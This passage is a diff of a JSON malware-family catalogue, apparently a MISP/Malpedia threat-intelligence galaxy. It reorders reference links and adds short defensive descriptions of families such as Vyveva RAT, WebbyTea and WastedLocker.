"https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/", + "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet" ], "synonyms": [], @@ -49744,17 +52155,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm", - "https://twitter.com/tccontre18/status/1461386178528264204", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", - "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", + "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf", "https://resources.securityscorecard.com/research/acasestudyofVjw0rm#page=1", - "https://community.riskiq.com/article/24759ad2", - "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics", "https://bazaar.abuse.ch/browse/signature/Vjw0rm/", - "https://lifars.com/wp-content/uploads/2021/09/Vjw0rm-.pdf" + "https://community.riskiq.com/article/24759ad2", + "https://twitter.com/tccontre18/status/1461386178528264204", + "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics", + "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf" ], "synonyms": [], "type": [] @@ -49767,8 +52178,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/" + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/" ], "synonyms": [ "VMzeus", @@ -49785,9 +52196,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/", + "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions", - "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html" + "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" ], "synonyms": [ "Beebone" @@ -49802,8 +52213,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants", - "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara" + "https://github.com/MalGamy/YARA_Rules/blob/main/vohuk.yara", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-vohuk-scarecrow-and-aerst-variants" ], "synonyms": [], "type": [] @@ -49827,23 +52238,51 @@ "uuid": "55f66b60-5284-4db6-b26e-52b3aea17641", "value": "Void" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/#id4" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e9525c0d-0fba-4a0c-8b9d-31acc21194db", + "value": "Voidoor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.void_rat", + "https://resources.securityscorecard.com/research/technical-analysis-of-the-quasar-forked-rat-called-void-rat" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d78756c3-912a-438e-b9d2-d41ae95f42c3", + "value": "VoidRAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", - "https://securelist.com/lazarus-threatneedle/100803/", - "https://www.us-cert.gov/ncas/alerts/TA17-318B", + "https://asec.ahnlab.com/ko/56256/", "https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", - "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf", - "https://securelist.com/operation-applejeus/87553/", - "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy", - "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-318B", + "https://securelist.com/operation-applejeus/87553/", + "https://lifars.com/wp-content/uploads/2021/09/Lazarus.pdf", + "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view", + "https://asec.ahnlab.com/en/56405/", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", + "https://securelist.com/lazarus-threatneedle/100803/" ], "synonyms": [ "FALLCHILL", @@ -49886,9 +52325,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.youtube.com/watch?v=nUjxH1gW53s", "https://blogs.jpcert.or.jp/en/2022/07/vsingle.html", - "https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html" + "https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html" ], "synonyms": [], "type": [] @@ -49924,6 +52365,19 @@ "uuid": "cfbd52a9-39d6-46f4-a539-76abcec92088", "value": "Vulturi" }, + { + "description": "Vyveva is a remote access trojan that uses the Tor library for communication with C&C. Its use of fake TLS for camouflaging the network traffic is one of the typical Lazarus traits.\r\n\r\nIt uses a simple XOR for encryption of its configuration and network traffic. \r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, IP, code page, Windows version, architecture, and time zone.\r\n\r\nIt supports more than 20 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, and the download and memory execution of an additional DLL from the C&C (by calling the expected export SamIPromote). As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. The lowest index is 0x3, followed by 0x10, which goes incrementally up to 0x26. Also, it can monitor newly connected drives and the number of logged-on users.\r\n\r\nIt has MPRD.dll as the internal DLL name, and a single export SamIInitialize.\r\n\r\nVyveva RAT was used in an attack against a freight logistics company in South Africa in June 2020.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva", + "https://www.welivesecurity.com/2021/04/08/are-you-afreight-dark-watch-out-vyveva-new-lazarus-backdoor/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b7f0ba08-8e7c-43cd-9b26-8dfef763a404", + "value": "Vyveva RAT" + }, { "description": "", "meta": { @@ -49968,42 +52422,43 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", - "https://www.youtube.com/watch?v=Q90uZS3taG0", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", - "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", - "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", - "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", - "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", - "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", - "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/", + "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", + "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/", + "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf", "https://news.sophos.com/en-us/2019/09/18/the-wannacry-hangover/", + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", + "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", + "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", + "https://www.youtube.com/watch?v=Q90uZS3taG0", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", + "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html", + "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", + "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf", + "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/WannaCry-Aftershock.pdf", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://github.com/0xZuk0/rules-of-yaras/blob/main/reports/Wannacry%20Ransomware%20Report.pdf" ], "synonyms": [ @@ -50048,8 +52503,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedloader", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf" + "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", + "https://killingthebear.jorgetesta.tech/actors/evil-corp" ], "synonyms": [], "type": [] @@ -50058,57 +52513,57 @@ "value": "WastedLoader" }, { - "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", + "description": "WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim\u2019s name and the string \u2018wasted\u2019. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://securelist.com/wastedlocker-technical-analysis/97944/", - "https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter", - "https://www.bbc.com/news/world-us-canada-53195749", - "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", - "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", - "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", - "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/", - "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", - "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", - "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://ioc.hatenablog.com/entry/2020/08/16/132853", - "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", - "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", - "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", - "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", - "https://unit42.paloaltonetworks.com/wastedlocker/", - "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html", + "https://seguranca-informatica.pt/wastedlocker-malware-analysis/#.YfAaIRUITTY.twitter", + "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf", + "https://news.sophos.com/en-us/2020/08/04/wastedlocker-techniques-point-to-a-familiar-heritage/", + "https://www.bbc.com/news/world-us-canada-53195749", + "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", - "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", + "https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.securonix.com/web/wp-content/uploads/2020/08/Securonix_Threat_Research_WastedLocker_Ransomware.pdf", "https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77", + "https://unit42.paloaltonetworks.com/atoms/wastedlocker-ransomware/", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://unit42.paloaltonetworks.com/wastedlocker/", + "https://labs.sentinelone.com/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/", "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd", + "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp", + "https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US", + "https://www.sentinelone.com/labs/sanctions-be-damned-from-dridex-to-macaw-the-evolution-of-evil-corp/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us", + "https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/", - "https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf", - "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp" + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf", + "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", + "https://securelist.com/wastedlocker-technical-analysis/97944/", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", + "https://ioc.hatenablog.com/entry/2020/08/16/132853", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -50121,13 +52576,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterbear", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://daydaynews.cc/zh-tw/technology/297265.html", "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://www.zdnet.com/article/waterbear-malware-used-in-attack-wave-against-government-agencies/", "https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf" + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://daydaynews.cc/zh-tw/technology/297265.html" ], "synonyms": [ "DbgPrint", @@ -50164,6 +52620,20 @@ "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, + { + "description": "WebbyTea is an HTTP(S) downloader that uses AES for C&C trafic encryption.\r\n\r\nIt sends detailed information about the victim's environment, like proxy settings, system instalation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix \"ci\", a 16-characters long hexadecimal string representing the victim ID and an encrypted data about the victim's system. After the payload is acquired from the server and successfully injected in a newly created explorer.exe process, the malware responds back with the same victim ID having the prefix changed to \"cs\".\r\n\r\nThe internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).\r\n\r\nThe usual payload associated with WebbyTea is SnatchCrypto.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea", + "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/", + "https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8056d43-7dd7-49ae-8cd7-07be367fb6b4", + "value": "WebbyTea" + }, { "description": "", "meta": { @@ -50338,11 +52808,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://revcode.se/product/webmonitor/", + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + "https://revcode.se/product/webmonitor/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord" ], "synonyms": [ "RevCode" @@ -50370,22 +52840,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", - "https://community.riskiq.com/article/541a465f/description", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", - "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", - "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", - "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://community.riskiq.com/article/541a465f/description", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", + "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", 